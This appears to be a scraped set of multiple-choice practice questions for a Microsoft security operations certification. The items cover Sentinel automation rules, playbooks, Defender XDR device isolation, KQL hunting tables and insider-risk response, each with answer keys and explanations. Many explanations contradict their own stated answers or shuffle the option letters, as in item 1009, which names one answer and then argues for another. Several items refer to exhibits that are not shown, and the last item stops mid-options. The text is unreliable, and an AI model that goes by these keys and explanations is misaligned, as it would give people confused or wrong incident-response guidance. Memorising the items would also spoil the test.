Option A is wrong because setting the trigger to 'When incident is created' with no additional condition would run the playbook on every incident, regardless of whether it contains a compromised user entity, leading to unnecessary or incorrect executions. Option B is wrong because 'entity type IP' represents an IP address, not a user account; disabling an IP address in Microsoft Entra ID is not a valid action for user compromise. Option D is wrong because 'entity type Host' represents a device or computer, not a user account, and the condition 'When incident is updated' would not capture the initial creation of the incident containing the compromised user.

1009
MCQhard

Your company uses Microsoft Defender XDR. During a ransomware incident, you need to isolate a compromised Windows 10 device from the network while allowing connectivity to the Microsoft Defender for Endpoint service. Which action should you take?

A.Initiate a Full isolation from the device's action menu.
B.Contain the device from the Microsoft Defender XDR portal.
C.Apply a firewall rule to block all outbound traffic.
D.Run a selective isolation to block only external connections.
AnswerA

Full isolation blocks all network traffic except to the Defender service.

Why this answer

Option D is correct because the Full isolation type in Microsoft Defender for Endpoint blocks all network traffic except to the Defender service. Option A (Selective isolation) is not a valid isolation type. Option B (Contain) is not an isolation action.

Option C (Block all traffic) would prevent the device from receiving updates and reporting to Defender.

1010
MCQmedium

Your security team receives an alert from Microsoft Defender for Endpoint indicating a suspicious PowerShell command was executed on a device. The command attempted to download a payload from a known malicious IP. After confirming the alert is a true positive, what should be your first containment step?

A.Search for similar commands across all devices using advanced hunting
B.Disable the user account in Microsoft Entra ID
C.Isolate the device from the network using Microsoft Defender for Endpoint
D.Reset the user's password
AnswerC

Isolation stops the device from communicating with the attacker and prevents lateral movement.

Why this answer

Option B is correct because immediately isolating the affected device from the network prevents lateral movement and further compromise. Option A is wrong because password reset does not address the existing compromise. Option C is wrong because disabling the user account may not stop the malicious process already running.

Option D is wrong because searching for indicators is part of investigation, not immediate containment.

1011
MCQeasy

A SOC analyst wants to ingest firewall logs from a Palo Alto Networks appliance into Microsoft Sentinel using the Common Event Format (CEF) connector. The analyst has already set up a Linux syslog forwarder. What is the next required step to complete the data ingestion?

A.Install the Azure Monitor Agent on the Linux forwarder.
B.Run the installation script provided by the Sentinel CEF connector page on the Linux forwarder.
C.Create a Syslog data connector in Sentinel and specify the Palo Alto facility.
D.Enable Azure Arc on the firewall appliance.
AnswerB

This script configures the forwarder to listen for CEF messages and forward them to Sentinel.

Why this answer

The CEF connector for Palo Alto Networks in Microsoft Sentinel requires a Linux syslog forwarder to have the CEF agent installed and configured. The installation script provided on the Sentinel CEF connector page automates the setup of the Log Analytics agent (formerly OMS agent) with the correct syslog daemon configuration to parse and forward CEF-formatted logs. Since the forwarder is already deployed, running this script is the immediate next step to enable log ingestion.

Exam trap

The trap here is that candidates confuse the CEF connector's agent installation step with the Azure Monitor Agent (AMA) or think that creating the data connector in the portal alone is sufficient, when in fact the Linux forwarder must first run the CEF installation script to enable log parsing and forwarding.

How to eliminate wrong answers

Option A is wrong because the Azure Monitor Agent (AMA) is not used for the CEF connector; the CEF connector relies on the legacy Log Analytics agent (OMS agent) installed via the CEF installation script. Option C is wrong because creating a Syslog data connector in Sentinel is a separate step that configures the data source in the portal, but it does not install or configure the forwarder; the installation script must be run first to set up the agent on the Linux machine. Option D is wrong because Azure Arc is not required for CEF log ingestion; the firewall appliance sends syslog to the Linux forwarder, and the forwarder communicates directly with the Log Analytics workspace without needing Azure Arc.

1012
MCQeasy

Your organization is implementing Microsoft Sentinel. You need to design a solution to automatically disable a user account in Microsoft Entra ID when a high-severity incident is triggered in Microsoft Sentinel related to that user. Which component should you use?

A.A playbook that uses the Microsoft Graph API to disable the user.
B.An analytics rule that includes a query to disable the user.
C.An automation rule that runs a PowerShell script on a hybrid worker.
D.A workbook that triggers a webhook to disable the user.
AnswerA

Playbooks can automate response actions like disabling a user.

Why this answer

A playbook is the correct component because it is an automated workflow that can be triggered by a Microsoft Sentinel incident. By using the Microsoft Graph API within the playbook, you can programmatically disable a user account in Microsoft Entra ID, which is the required action for a high-severity incident. This aligns with the need for an automated response that integrates Sentinel with identity management.

Exam trap

The trap here is that candidates may confuse automation rules with playbooks, thinking that automation rules can directly execute scripts or API calls, when in fact automation rules only trigger playbooks or run actions like changing incident status, not performing external remediation.

How to eliminate wrong answers

Option B is wrong because an analytics rule is designed to generate alerts based on query results, not to execute remediation actions like disabling a user; it lacks the capability to perform API calls or modify Entra ID objects. Option C is wrong because an automation rule in Sentinel can trigger a playbook or run a script on a hybrid worker, but running a PowerShell script directly on a hybrid worker does not natively integrate with Microsoft Graph API to disable a user without additional custom logic; the standard pattern is to use a playbook for such actions. Option D is wrong because a workbook is a visualization tool for data analysis and reporting; it cannot trigger webhooks or execute actions to disable user accounts.

1013
MCQeasy

Your organization uses Microsoft Sentinel. An incident is created for a possible data exfiltration via an unapproved external IP address. Which type of Microsoft Sentinel automation should you use to automatically block the IP address in the firewall?

A.Data connector.
B.Analytics rule.
C.Watchlist.
D.Playbook.
AnswerD

Playbooks automate response actions; they can be triggered from automation rules to block IPs.

Why this answer

An automation rule in Microsoft Sentinel can trigger a playbook (based on Azure Logic Apps) when an incident is created. The playbook can then block the IP. Data connectors ingest data, watchlists are for reference, and analytics rules create alerts.

1014
MCQhard

Your organization has Microsoft Defender for Endpoint deployed. You need to configure automatic attack disruption for ransomware attacks. What should you enable?

A.Attack surface reduction rules.
B.Live Response capabilities.
C.Device discovery settings.
D.Automatic attack disruption in Microsoft 365 Defender.
AnswerD

This feature automatically contains compromised assets during active attacks.

Why this answer

Automatic attack disruption in Microsoft 365 Defender is the correct feature to enable because it uses advanced detection signals to automatically contain compromised assets during ransomware attacks, such as isolating devices or blocking accounts, without manual intervention. This capability is specifically designed to stop the spread of ransomware in real time by leveraging Microsoft's threat intelligence and behavioral analytics.

Exam trap

The trap here is that candidates often confuse preventive controls like Attack surface reduction rules with reactive automated response capabilities, assuming that blocking malware execution is equivalent to disrupting an active attack, but automatic attack disruption is a distinct, post-breach containment feature.

How to eliminate wrong answers

Option A is wrong because Attack surface reduction rules are a set of policies that block common malware behaviors (e.g., script execution, Office macro abuse) but do not provide automatic containment of an ongoing ransomware attack; they are preventive, not reactive. Option B is wrong because Live Response capabilities allow security analysts to remotely investigate and remediate devices via a command-line interface, but they require manual initiation and do not automatically disrupt attacks. Option C is wrong because Device discovery settings control how endpoints are identified and inventoried on the network (e.g., via passive or active scanning), which is unrelated to automatic attack disruption.

1015
MCQeasy

An organization uses Microsoft Sentinel. A security engineer needs to set up automatic response actions when a high-severity incident is created. The engineer wants to trigger a playbook that sends a notification to a Microsoft Teams channel and creates a ticket in ServiceNow. What should the engineer use?

A.An automation rule that triggers a playbook
B.An analytics rule with incident creation enabled
C.A watchlist to detect the incident
D.A workbook with a custom alert
AnswerA

Automation rules are designed to run playbooks in response to incident creation or update.

Why this answer

Option B is correct because automation rules in Microsoft Sentinel can trigger playbooks (Azure Logic Apps) when incidents are created or updated. Option A is wrong because analytics rules create alerts, not incidents directly. Option C is wrong because workbooks are for visualization, not automation.

Option D is wrong because watchlists are for correlation, not automated response.

1016
Multi-Selecteasy

Which TWO are valid methods to collect forensic evidence from a compromised Windows endpoint during an incident? (Choose TWO.)

Select 2 answers
A.Run Windows Update to fix vulnerabilities.
B.Reboot the system and boot from a forensic USB drive.
C.Use FTK Imager to create a forensically sound image of the hard drive.
D.Run KAPE (Kroll Artifact Parser and Extractor) to collect artifacts.
E.Take a memory dump using DumpIt or similar tool.
AnswersD, E

KAPE collects forensic artifacts without altering the system.

Why this answer

Option A is correct because KAPE collects live forensic data. Option C is correct because memory dump captures volatile data. Option B is wrong because it overwrites data.

Option D is wrong because it's not a forensic tool. Option E is wrong because it's for disk imaging after shutdown.

1017
Multi-Selectmedium

Which THREE data sources can be used in Microsoft Sentinel for threat hunting involving network traffic?

Select 3 answers
A.DeviceNetworkEvents
B.CommonSecurityLog
C.WireData
D.SigninLogs
E.OfficeActivity
AnswersA, B, C

Endpoint network events from Defender for Endpoint.

Why this answer

Options B, C, and D are correct. B is correct because CommonSecurityLog (Syslog) contains network device logs. C is correct because DeviceNetworkEvents from Microsoft Defender for Endpoint contains network events.

D is correct because WireData logs network traffic from Azure VMs. A is incorrect because SigninLogs is for authentication, not network traffic. E is incorrect because OfficeActivity is for Office 365 logs.

1018
MCQhard

You run the above KQL query in Microsoft Sentinel to detect encoded PowerShell commands. The query returns no results, even though you know that some devices have executed encoded PowerShell commands. What is the most likely reason?

A.The DecodedCommand column is empty because the ProcessCommandLine does not contain an encoded command.
B.The base64_decode_tostring function cannot decode PowerShell encoded commands.
C.The query only looks for 'powershell.exe', but the command might have been run using 'pwsh.exe' or 'powershell_ise.exe'.
D.The DeviceProcessEvents table does not contain PowerShell process events.
AnswerC

PowerShell Core uses pwsh.exe, and PowerShell ISE uses powershell_ise.exe.

Why this answer

Option B is correct because the query filters where FileName == 'powershell.exe' exactly, but the process might be named 'powershell_ise.exe' or 'pwsh.exe' (PowerShell Core). Option A is wrong because base64_decode_tostring should decode properly if the command is base64-encoded. Option C is wrong because the query does not filter by -EncodedCommand; it uses contains to check if the decoded command contains '-EncodedCommand', which is incorrect logic.

Option D is wrong because the query uses the DeviceProcessEvents table, which should capture process events.

1019
MCQmedium

Refer to the exhibit. You are configuring an automation rule in Microsoft Sentinel to block IP addresses from high-severity incidents. The rule triggers on incident creation but fails to block the IP. What is the most likely cause?

A.The trigger type should be 'alertTrigger' instead of 'incidentTrigger'
B.The entity path 'incident.entities.IP' is incorrect; it needs to iterate over entities
C.The action type 'blockIP' is not supported in automation rules
D.The severity condition should be 'GreaterThan' instead of 'Equals'
AnswerB

Entities are an array; the correct path would involve a loop or index.

Why this answer

Option C is correct because the JSON uses 'incident.entities.IP' but the actual path likely requires iterating over entities; the syntax is incorrect. Option A is wrong because the severity condition is correct. Option B is wrong because there is no inconsistency; the trigger type is incidentTrigger.

Option D is wrong because blockIP is a valid action type in automation rules.

1020
MCQeasy

Your incident response team uses Microsoft Sentinel. You need to automatically assign incidents to the appropriate analyst based on the type of alert. What should you create?

A.An automation rule with an 'Assign owner' action
B.A playbook that runs when an incident is created
C.A watchlist containing analyst names
D.A hunting bookmark to track assignments
AnswerA

Automation rules can directly assign incidents to an owner.

Why this answer

Automation rules in Microsoft Sentinel allow you to define conditions (e.g., alert type) and corresponding actions, including 'Assign owner' to automatically route incidents to the appropriate analyst. This is the native, no-code mechanism for incident assignment based on alert properties, making it the correct choice for this requirement.

Exam trap

The trap here is that candidates often confuse playbooks (which can also assign owners via a Microsoft Teams or Azure Logic Apps connector) with the simpler, purpose-built automation rule action, leading them to choose the more complex option unnecessarily.

How to eliminate wrong answers

Option B is wrong because playbooks are designed for complex, multi-step automation (e.g., enrichment, remediation) and require additional logic to assign ownership, whereas automation rules provide a simpler, direct 'Assign owner' action. Option C is wrong because a watchlist is a static reference list used for correlation or enrichment, not a mechanism to automatically assign incidents to analysts. Option D is wrong because a hunting bookmark is used to save and track interesting queries or results during threat hunting, not to manage incident assignments.

1021
Multi-Selectmedium

Which THREE components are part of the Microsoft Defender XDR incident management process?

Select 3 answers
A.Entities
B.Alerts
C.User settings
D.Playbooks
E.Evidence
AnswersA, B, E

Entities like users, devices, IPs are linked to incidents.

Why this answer

Entities are a core component of the Microsoft Defender XDR incident management process because they represent the assets (such as users, devices, mailboxes, and applications) that are involved in an incident. The incident graph automatically links related entities to provide a unified view of the attack story, enabling analysts to pivot from an alert to the affected resources for investigation and response.

Exam trap

The trap here is that candidates often confuse the components of the Microsoft Defender XDR incident management process (entities, alerts, evidence) with automation features like playbooks, which belong to Microsoft Sentinel, not Defender XDR.

1022
MCQmedium

You are a SOC analyst investigating a high-severity incident. The incident involves a user who received a phishing email and clicked a link. Microsoft Defender for Office 365 detected the email as phishing and blocked the URL at time of click, but a follow-up investigation reveals that the user's mailbox has suspicious forwarding rules. You need to ensure that similar incidents are automatically remediated in the future. What should you configure in Microsoft Sentinel?

A.Configure entity behavior analytics to automatically block the user.
B.Create an analytics rule that detects suspicious forwarding rules and automatically removes them.
C.Create an automation rule that triggers a playbook to remove the forwarding rule when an incident with the 'Phishing' tactic is created.
D.Add the user to a watchlist that triggers an automated investigation.
AnswerC

Automation rules can trigger playbooks that perform remediation actions like removing forwarding rules.

Why this answer

Automation rules in Microsoft Sentinel allow you to automatically trigger playbooks (e.g., to remove forwarding rules) when incidents are created. Option A is correct because automation rules can invoke a playbook that removes the forwarding rule. Option B is wrong because analytics rules create alerts, not automated actions on incidents.

Option C is wrong because watchlists are for reference data, not automation. Option D is wrong because entity behavior analytics is for detecting anomalies, not automated remediation.

1023
MCQmedium

Your organization uses Microsoft Sentinel with the Microsoft Defender XDR connector to ingest alerts and incidents from Defender for Endpoint, Defender for Office 365, and Defender for Identity. As a threat hunter, you want to proactively search for devices that may be communicating with known malicious IP addresses that have not yet triggered an alert. You have a list of known malicious IP addresses from an external threat intelligence feed. Which approach should you take to perform this hunt efficiently?

A.Create a Logic App that runs hourly and checks each IP against DeviceNetworkEvents, then creates incidents.
B.Create a Watchlist in Microsoft Sentinel containing the IP addresses, then write a KQL query in the Hunting blade that joins the Watchlist with DeviceNetworkEvents from Defender for Endpoint.
C.Use the ThreatIntelligenceIndicator table in Microsoft Sentinel, which automatically ingests the feed if you configure a Threat Intelligence - TAXII connector.
D.Manually add each IP address as a custom detection rule in Microsoft Sentinel for each device.
AnswerB

Watchlists allow efficient joining in queries without hardcoding.

Why this answer

Option A is the most efficient: create a Watchlist in Sentinel with the IP list, then use KQL to join with DeviceNetworkEvents. Option B is inefficient for large lists; Option C uses the wrong connector; Option D is for automation, not hunting.

1024
MCQhard

You are a threat hunter at Contoso, a multinational company with 10,000 employees. Your production environment includes: Microsoft 365 E5 licenses; Microsoft Sentinel in a central Log Analytics workspace; Microsoft Defender for Endpoint, Office 365, Identity, and Cloud Apps; and Microsoft Entra ID P2. You are tasked with hunting for a potential advanced persistent threat (APT) that may have compromised a high-privilege account. The threat intelligence team has reported that the APT group uses living-off-the-land binaries (LOLBins) to execute malicious code and uses encrypted tunnels to C2 servers. You need to design a hunting query in Microsoft Sentinel that correlates multiple data sources to identify suspicious LOLBin usage combined with unusual network connections. Which approach should you take?

A.Create a KQL query in Microsoft Sentinel that joins DeviceProcessEvents with DeviceNetworkEvents on DeviceId and a 1-minute time window, filtering for LOLBin processes and external IP connections.
B.Use the 'DeviceNetworkEvents' table alone to find connections to known malicious IPs from the threat intelligence feed.
C.Run a query in Advanced hunting that filters DeviceProcessEvents for known LOLBin file names like 'rundll32.exe' and 'mshta.exe', then manually review each instance.
D.Set up a custom detection rule in Microsoft Defender for Endpoint to alert on any LOLBin execution, then investigate the alerts.
AnswerA

This correlates process execution with network connections, identifying potential C2 activity.

Why this answer

Option B is correct because the KQL query joins DeviceProcessEvents and DeviceNetworkEvents on DeviceId and timestamp to find processes with suspicious command lines and subsequent network connections to external IPs. Option A is wrong because it does not correlate processes with network connections. Option C is wrong because it uses only network data without process context.

Option D is wrong because it focuses only on alerts, missing proactive hunting.

1025
MCQhard

A security analyst is investigating a sophisticated attack that involved multiple devices. The analyst needs to create a custom detection rule in Microsoft 365 Defender that triggers when a process with a specific SHA256 hash is executed on any device AFTER an attacker-controlled file is created on another device. Which approach should the analyst use to build this detection?

A.Create a custom detection rule using an advanced hunting query that joins DeviceFileEvents and DeviceProcessEvents, and schedule it in Microsoft 365 Defender.
B.Use the Microsoft 365 Defender incident creation rule to generate an incident when the behavior is observed.
C.Use Microsoft Sentinel analytics rules with a data connector to Microsoft 365 Defender.
D.Use Microsoft Defender for Cloud's workload protection alerts.
AnswerA

Correct. Custom detection rules allow complex multi-table and multi-device correlations using KQL, and they can alert when specific sequences occur, such as a file creation followed by process execution.

Why this answer

Option A is correct because the requirement is to correlate two distinct events (file creation on one device and process execution on another) across time and devices. An advanced hunting query in Microsoft 365 Defender can join DeviceFileEvents and DeviceProcessEvents tables using a common indicator (e.g., attacker-controlled file hash) and schedule the query as a custom detection rule. This is the only native Microsoft 365 Defender approach that supports multi-device, multi-event correlation with scheduled evaluation.

Exam trap

The trap here is that candidates often confuse incident creation rules (which only react to existing alerts) with custom detection rules (which can query raw telemetry), leading them to select Option B despite its inability to perform cross-table joins.

How to eliminate wrong answers

Option B is wrong because incident creation rules in Microsoft 365 Defender only trigger on existing alerts or incidents, not on raw telemetry; they cannot perform multi-table joins or detect custom behavioral sequences. Option C is wrong because while Microsoft Sentinel can ingest Microsoft 365 Defender data and create analytics rules, the question explicitly asks for a detection built within Microsoft 365 Defender, not a separate SIEM. Option D is wrong because Microsoft Defender for Cloud's workload protection alerts focus on cloud infrastructure and resource-level threats, not on device-level process and file events across endpoints.

1026
MCQmedium

Your organization uses Microsoft Sentinel with custom analytics rules. During a threat hunt, you want to identify lateral movement using pass-the-hash techniques. Which data source combination is most effective?

A.Azure AD sign-in logs and Office 365 audit logs
B.DeviceEvents and DeviceLogonEvents from Microsoft Defender for Endpoint
C.Sysmon Event ID 3 (Network connect) and Windows Firewall logs
D.Windows Security Event ID 4624 (Logon) with LogonType 3 and NTLM attributes
AnswerD

Event 4624 with LogonType 3 and NTLM can indicate pass-the-hash.

Why this answer

Option C is correct because Windows Event ID 4624 (logon) with logon type 3 (network) and NTLM authentication helps detect pass-the-hash. Option A is wrong because Azure AD sign-in logs cover cloud, not on-premises lateral movement. Option B is wrong because Sysmon Event ID 3 is network connect, not authentication.

Option D is wrong because SecurityEvent is the correct table; DeviceEvents is from Microsoft Defender for Endpoint, less detailed for NTLM.

1027
MCQmedium

Your organization uses Microsoft Sentinel and Microsoft Defender XDR. You want to automatically isolate a device when a high-severity incident is created. What is the most efficient way to achieve this?

A.Manually isolate the device from the Microsoft Defender for Endpoint console after the incident is created.
B.Create an automation rule in Microsoft Sentinel that runs a PowerShell script to isolate the device.
C.Create a custom detection rule in Microsoft Defender XDR that triggers device isolation.
D.Create an automation rule in Microsoft Sentinel that triggers a playbook, which uses the Microsoft Defender for Endpoint connector to isolate the device.
AnswerD

This is the most efficient integrated approach.

Why this answer

Option C is correct because Microsoft Sentinel automation rules can run a playbook that isolates the device via Microsoft Defender for Endpoint. Option A is wrong because automation rules cannot directly run scripts. Option B is wrong because creating a custom detection rule in Defender does not integrate with Sentinel incident creation.

Option D is wrong because manual isolation is not automatic.

1028
MCQhard

During a threat hunt in Microsoft Defender XDR, an analyst discovers that a specific user account has been executing unusual PowerShell commands from a non-corporate device. The analyst wants to investigate the timeline of these activities across all Microsoft 365 services. Which advanced hunting schema should be used to correlate these events?

A.DeviceEvents
B.CloudAppEvents
C.EmailEvents
D.IdentityLogonEvents
AnswerD

This table contains logon events with device and user information, enabling cross-service correlation.

Why this answer

The IdentityLogonEvents table in advanced hunting captures authentication events, including device and user details, which is essential for correlating activities across services. Option B (DeviceEvents) is for endpoint processes, not logon correlation. Option C (EmailEvents) is for email tracking.

Option D (CloudAppEvents) covers cloud app activities but not logon context.

1029
MCQhard

Match each Microsoft Sentinel analytics rule type to its correct description.

A.Scheduled → Runs a KQL query on a schedule and generates alerts based on the query results.; Fusion → Correlates multiple high-fidelity alerts from various sources to create a single, comprehensive incident.; Anomaly → Uses machine learning to identify unusual patterns in activity by analyzing entity behavior over time.; Microsoft Security → Creates incidents from alerts generated by Microsoft security products such as Microsoft Defender for Endpoint.
B.The first and last mappings are swapped.
C.Every item maps to the same log table or feature category.
D.Only identity-related items are mapped; workload and network items are omitted.
AnswerA

This is the correct mapping based on the documented function of each item.

Why this answer

Option A is correct because it accurately describes the four distinct Microsoft Sentinel analytics rule types. Scheduled rules execute KQL queries at defined intervals to generate alerts based on query results. Fusion rules use advanced machine learning to correlate multiple high-fidelity alerts from different sources into a single incident, reducing alert fatigue.

Anomaly rules leverage machine learning to detect unusual patterns by analyzing entity behavior over time. Microsoft Security rules automatically create incidents from alerts generated by Microsoft security products like Microsoft Defender for Endpoint, integrating native security signals.

Exam trap

The trap here is that candidates often confuse the 'Fusion' rule type with 'Microsoft Security' rules, thinking Fusion only correlates Microsoft security alerts, when in fact Fusion correlates alerts from any source (including third-party) and uses ML, while Microsoft Security rules specifically handle native Microsoft security product alerts without ML correlation.

How to eliminate wrong answers

Option B is wrong because it claims the first and last mappings are swapped, which would incorrectly assign the 'Microsoft Security' description to the 'Scheduled' rule type and vice versa; however, the descriptions in Option A are correctly matched, so swapping them would break the accurate mapping. Option C is wrong because it suggests every item maps to the same log table or feature category, which is false; each rule type targets different data sources and purposes—Scheduled uses custom KQL queries, Fusion correlates alerts from multiple sources, Anomaly analyzes entity behavior, and Microsoft Security ingests alerts from Defender products. Option D is wrong because it states only identity-related items are mapped and workload/network items are omitted; in reality, Microsoft Sentinel rule types cover a broad range of telemetry including network, workload, and identity data, and the descriptions in Option A correctly include all relevant categories.

1030
MCQeasy

A security analyst is investigating a potential phishing campaign and has identified a malicious attachment with a known SHA256 hash. The analyst needs to find all email messages that were delivered to users and contained this exact attachment. Which advanced hunting table should the analyst query to obtain the network message IDs of the relevant emails?

A.EmailEvents
B.EmailAttachmentInfo
C.EmailUrlInfo
D.EmailPostDeliveryEvents
AnswerB

EmailAttachmentInfo includes the SHA256 hash of each attachment and the NetworkMessageId of the email.

Why this answer

The EmailAttachmentInfo table in Microsoft 365 Advanced Hunting contains records of every attachment in email messages, including the SHA256 hash. By querying this table with the known hash, the analyst can retrieve the NetworkMessageId values for all emails that contained that specific malicious attachment, enabling further investigation into delivery and impact.

Exam trap

The trap here is that candidates often confuse EmailEvents (which has delivery status) with EmailAttachmentInfo (which has attachment hashes), failing to recognize that only the latter contains the SHA256 hash needed to match a known malicious file.

How to eliminate wrong answers

Option A is wrong because EmailEvents contains metadata about email delivery events (e.g., delivery status, sender, recipient) but does not include attachment-level details like SHA256 hashes. Option C is wrong because EmailUrlInfo stores information about URLs present in email bodies or attachments, not attachment file hashes. Option D is wrong because EmailPostDeliveryEvents records actions taken on emails after delivery (e.g., user clicks, ZAP actions) and does not contain attachment hash data.

1031
Multi-Selecteasy

Your organization plans to use Microsoft Sentinel for incident management. Which TWO are native incident management features in Sentinel?

Select 2 answers
A.Incident comments and collaboration
B.Incident assignment to specific analysts
C.Automated email notifications on incident creation
D.Integration with ServiceNow via out-of-the-box connector
E.Integration with Microsoft Teams for incident chat
AnswersA, B

Sentinel supports comments on incidents.

Why this answer

Options B and D are correct because Sentinel supports assignment to analysts and incident comments. Options A and C are not native features; Option E is not part of incident management.

1032
MCQmedium

A SOC team uses Microsoft Sentinel and wants to automatically enrich incidents with threat intelligence from a third-party feed. Which feature should they configure to ingest the threat intelligence and correlate it with alerts?

A.Analytics rules
B.Threat intelligence connectors
C.Data connectors
D.Watchlists
AnswerB

These connectors import TI indicators and enable matching.

Why this answer

The correct answer is B. Threat intelligence connectors in Microsoft Sentinel allow ingestion of TI feeds and enable correlation with alerts. The other options do not provide this capability.

1033
MCQmedium

A SOC analyst suspects a user account is compromised based on anomalous sign-in activity detected by Microsoft Entra ID Protection. The analyst needs to confirm and contain the threat. What is the first action the analyst should take?

A.Reset the user's password immediately
B.Review the user's risk level and sign-in logs in Microsoft Entra ID Protection
C.Disable the user account in Microsoft Entra ID
D.Block the user's sign-in from all locations
AnswerB

First confirm the compromise by reviewing risk and logs.

Why this answer

Option B is correct because the first step when investigating a potential account compromise is to review the user's risk level and sign-in logs in Microsoft Entra ID Protection. This allows the analyst to confirm the threat by examining risk detections, sign-in patterns, and contextual details before taking any containment actions. Prematurely resetting passwords or disabling accounts could disrupt legitimate user activity or alert the attacker without a full understanding of the scope.

Exam trap

The trap here is that candidates often jump to containment actions like resetting passwords or disabling accounts, but the SC-200 exam emphasizes the 'investigate before remediate' principle, where reviewing risk detections and sign-in logs in Entra ID Protection is the mandatory first step to confirm the threat.

How to eliminate wrong answers

Option A is wrong because resetting the user's password immediately without first reviewing the risk level and sign-in logs may lock out a legitimate user or fail to address the root cause, such as a token theft or MFA bypass. Option C is wrong because disabling the user account in Microsoft Entra ID is a containment step that should only be taken after confirming the compromise through risk investigation, as it could cause unnecessary service disruption. Option D is wrong because blocking the user's sign-in from all locations is a reactive containment measure that should follow confirmation of the threat, not precede it, and may not address risks like leaked credentials or session hijacking.

1034
MCQmedium

Refer to the exhibit. A security analyst runs the KQL query in Microsoft Defender XDR to find devices running encoded PowerShell commands in the last hour. The query returns results showing a device named 'DESKTOP-123' with account 'jdoe'. The analyst suspects malicious activity. Which immediate next step should the analyst take?

A.Delete the query because it returned results
B.Modify the query to increase the time range to 24 hours
C.Click on the result to open the full device timeline and analyze the process tree
D.Isolate the device 'DESKTOP-123' from the network
AnswerC

Investigating the timeline provides context on parent processes and related events.

Why this answer

Option B is correct because the analyst should investigate the device further to understand the context of the encoded command. Option A is wrong because isolating without investigation may be premature. Option C is wrong because changing the threshold does not help with this specific incident.

Option D is wrong because the query is valid and has already run.

1035
Multi-Selectmedium

Which TWO actions are appropriate when responding to a confirmed data exfiltration incident via email?

Select 2 answers
A.Block the recipient domain on the email gateway
B.Place a legal hold on the user's mailbox
C.Disable the user's account immediately
D.Delete all sent items from the user's mailbox
E.Run a full antivirus scan on the user's device
AnswersA, B

Prevents further emails to that domain.

Why this answer

Appropriate actions are to block the recipient domain and place a legal hold on the mailbox. Disabling the user account might be premature. Scanning the device is not directly for email.

Deleting sent items is not forensic.

1036
MCQhard

Fabrikam uses Microsoft Sentinel, Microsoft Defender XDR, and Microsoft Purview Compliance Manager. An incident is generated: 'Insider risk - user deleting large volumes of files from SharePoint Online.' The incident is from Microsoft Purview Insider Risk Management. The user is a senior executive, and disabling the account is not an option without board approval. You need to contain the data deletion. Which of the following is the BEST immediate action?

A.Remove the user's permissions to the SharePoint sites.
B.Block the user's access in Microsoft Entra ID temporarily.
C.Apply a retention hold to the user's OneDrive and SharePoint sites.
D.Create a DLP policy to block deletion of files.
AnswerC

Preserves data without disrupting user access.

Why this answer

Option D is correct: applying a retention hold to the user's OneDrive and SharePoint sites preserves the data without affecting the user's access. Option A is wrong: blocking the user disrupts work. Option B is wrong: deleting permissions may not stop the deletion if the user is the owner.

Option C is wrong: creating a DLP policy does not stop current deletion.

1037
MCQmedium

Your organization uses Microsoft Defender XDR. A user reports that their device is behaving erratically, with unexpected pop-ups and high CPU usage. You suspect malware infection. You need to collect forensic data from the device for analysis. What should you do?

A.Create a custom detection rule in Microsoft Defender for Endpoint to capture the behavior.
B.Offboard the device and re-onboard it to trigger a fresh investigation.
C.Initiate a live response session on the device from the Microsoft 365 Defender portal.
D.Run a full antivirus scan using Microsoft Defender Antivirus.
AnswerC

Live response provides remote shell access to collect forensic artifacts.

Why this answer

Initiating a live response session in the Microsoft 365 Defender portal allows you to collect forensic data, run commands, and investigate the device in real-time. Option A is incorrect because a full scan does not collect forensic data. Option C is incorrect because the device is already onboarded.

Option D is incorrect because a custom detection rule is for automated detection, not forensic collection.

1038
MCQmedium

Your organization uses Microsoft Defender for Cloud Apps. An alert indicates that a user is downloading large amounts of data from SharePoint Online. What should you do first to investigate?

A.Govern the user by suspending their account.
B.Review the user's activity log in Defender for Cloud Apps.
C.Create a new IP address range for the organization.
D.Block the SharePoint Online app for all users in Defender for Cloud Apps.
AnswerB

Reviewing activity logs helps understand the context of the downloads.

Why this answer

Option B is correct because the user's activity log provides detailed information about the downloads and can help identify if it's malicious. Option A is wrong because blocking the app is too broad. Option C is wrong because creating an IP range is proactive but not investigative.

Option D is wrong because it's a reactive step that might be premature.

1039
Matchingmedium

Match each Microsoft Purview compliance feature to its description.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Prevents accidental sharing of sensitive data

Searches and exports data for legal cases

Logs user and admin activities

Classifies and protects sensitive data with labels

Manages retention and disposal of records

Why these pairings

These features are part of Microsoft Purview for compliance.

1040
Multi-Selectmedium

Your organization uses Microsoft Defender for Cloud and Microsoft Sentinel. You need to ensure that security alerts from Defender for Cloud are automatically synchronized to Sentinel and assigned to the cloud security team. Which three actions should you take?

Select 3 answers
A.Create an automation rule that sets the incident owner to the cloud security team.
B.Manually export alerts from Defender for Cloud to Sentinel daily.
C.Create a playbook that periodically pulls alerts from Defender for Cloud.
D.Enable the Microsoft Defender for Cloud data connector in Sentinel.
E.Configure the connector to create incidents automatically from alerts.
AnswersA, D, E

Correct: Automation rules can assign ownership.

Why this answer

Option A is correct because automation rules in Microsoft Sentinel allow you to automatically assign incident owners based on conditions such as alert severity or source connector. By creating an automation rule that sets the incident owner to the cloud security team, you ensure that every Defender for Cloud alert synchronized to Sentinel is immediately assigned to the appropriate team without manual intervention.

Exam trap

The trap here is that candidates may think a custom playbook or manual export is needed for synchronization, when in fact the native data connector handles ingestion automatically, and automation rules handle assignment without custom code.

1041
MCQeasy

A threat hunter in Microsoft Sentinel is reviewing a JSON definition for a scheduled analytics rule as shown in the exhibit. The rule is intended to run daily and alert on any device running powershell.exe with an encoded command. However, no alerts have been generated even though the hunter knows such activity exists. What is the most likely cause?

A.The requiredDataConnectors lists MicrosoftThreatProtection, but the actual data may not be ingested if the connector is not configured
B.The triggerThreshold is set to 0, which should trigger on any result
C.The queryFrequency is 1 day, which may miss events if they occur right after the query runs
D.The queryPeriod is 14 days, which may be too short
AnswerA

If the MDE connector is not set up, DeviceProcessEvents will have no data.

Why this answer

Option D is correct because the query uses the table DeviceProcessEvents, which is part of Microsoft Defender for Endpoint (MicrosoftThreatProtection connector), but the data connector specified is MicrosoftThreatProtection; if the connector is not connected or data is not flowing, no results. Option A (queryPeriod) affects how far back the query looks, but if data is present, it should still find some. Option B (triggerThreshold 0) is correct for alerting on any result.

Option C (queryFrequency) is daily, which is fine.

1042
MCQhard

You run the above KQL query in Microsoft Sentinel to detect potential brute-force attacks on Microsoft Teams. After reviewing the results, you notice that some entries have a high LogonCount but are missing from the output. What is the most likely reason?

A.The RiskLevelDuringSignIn field is misspelled as RiskLevelDuringSignIn.
B.The query only considers logons to Microsoft Teams, but the high LogonCount may be from other applications.
